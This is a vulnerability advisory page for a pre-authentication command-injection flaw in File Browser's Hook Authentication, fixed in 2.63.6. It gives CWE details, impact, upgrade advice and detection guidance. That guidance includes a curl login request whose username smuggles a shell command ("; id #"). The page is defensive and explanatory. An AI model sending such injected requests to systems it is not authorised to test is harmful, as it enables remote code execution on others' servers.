CVE-2026-54088
Deferred Deferred - Pending Action
Pre-authentication RCE in File Browser via Shell Command Injection

Publication date: 2026-06-25

Last updated on: 2026-06-25

Assigner: GitHub, Inc.

Description
File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to 2.63.6, the Hook Authentication feature in File Browser allows administrators to delegate login verification to an external shell command. User-supplied credentials (username and password) are interpolated into this command string using os.Expand without sanitization. An unauthenticated remote attacker can inject shell metacharacters in the username or password field at the login screen, causing the server to execute arbitrary OS commands before any authentication takes place. This is a critical pre-authentication RCE. This vulnerability is fixed in 2.63.6.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-25
Last Modified
2026-06-25
Generated
2026-06-26
AI Q&A
2026-06-25
EPSS Evaluated
N/A
NVD
CVE-2026-54088
EUVD
EUVD-2026-39510
Affected Vendors & Products
Showing 3 associated CPEs
Vendor Product Version / Range
file_browser file_browser 2.63.6
filebrowser file_browser to 2.63.6 (exc)
filebrowser file_browser 2.63.6
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-306 The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
CWE-88 The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Compliance Impact

This vulnerability allows unauthenticated remote attackers to execute arbitrary OS commands on the server before authentication, leading to full system compromise. Such a compromise can result in unauthorized access to sensitive data, data exfiltration, and persistent backdoors, which directly threaten the confidentiality, integrity, and availability of data.

Because of these impacts, affected systems may fail to comply with common standards and regulations like GDPR and HIPAA, which require strict controls to protect personal and sensitive data from unauthorized access and breaches.

Organizations using vulnerable versions of File Browser with Hook Authentication enabled risk violating these regulations due to potential data breaches and loss of control over protected information.

Detection Guidance

This vulnerability can be detected by checking if your File Browser instance is running a vulnerable version (2.63.5 or earlier) with the Hook Authentication feature enabled.

Since the vulnerability involves injection of shell metacharacters in the username or password fields at login, one way to detect it is by attempting to send specially crafted login requests that include shell metacharacters and observing if arbitrary commands are executed on the server.

For example, you can test the login endpoint with a username containing shell metacharacters such as "; id #" to see if the server executes the 'id' command.

A sample curl command to test this might be:

  • curl -X POST http://<filebrowser-server>/api/login -d '{"username":"; id #","password":"anything"}' -H 'Content-Type: application/json'

If the server responds with output indicating command execution (such as user information from the 'id' command), the system is vulnerable.

Additionally, monitoring logs for unexpected command executions or unusual login attempts containing shell metacharacters can help detect exploitation attempts.

Executive Summary

This vulnerability exists in File Browser versions prior to 2.63.6 in the Hook Authentication feature. The feature allows administrators to delegate login verification to an external shell command. However, user-supplied credentials (username and password) are inserted into this command string without proper sanitization using os.Expand.

Because of this lack of sanitization, an unauthenticated remote attacker can inject shell metacharacters into the username or password fields at the login screen. This causes the server to execute arbitrary operating system commands before any authentication occurs, leading to a critical pre-authentication remote code execution (RCE) vulnerability.

This vulnerability was fixed in version 2.63.6 of File Browser.

Impact Analysis

This vulnerability can have severe impacts because it allows an unauthenticated remote attacker to execute arbitrary OS commands on the server running File Browser.

  • Complete compromise of the server hosting File Browser.
  • Unauthorized access to sensitive files managed by File Browser.
  • Potential for further attacks within the network due to server compromise.
  • Disruption of services or data loss caused by malicious commands.
Mitigation Strategies

The vulnerability is fixed in File Browser version 2.63.6. The immediate step to mitigate this vulnerability is to upgrade your File Browser installation to version 2.63.6 or later.

Until the upgrade can be performed, consider disabling the Hook Authentication feature to prevent execution of arbitrary OS commands via unsanitized user input.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-54088. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart